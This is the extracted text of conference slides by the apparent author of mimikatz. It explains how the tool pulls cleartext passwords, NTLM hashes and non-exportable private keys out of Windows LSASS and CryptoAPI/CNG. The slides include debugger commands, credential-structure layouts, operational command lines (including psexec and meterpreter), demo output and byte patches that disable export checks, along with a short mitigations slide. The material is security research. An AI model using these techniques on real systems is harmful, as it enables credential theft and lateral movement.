07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
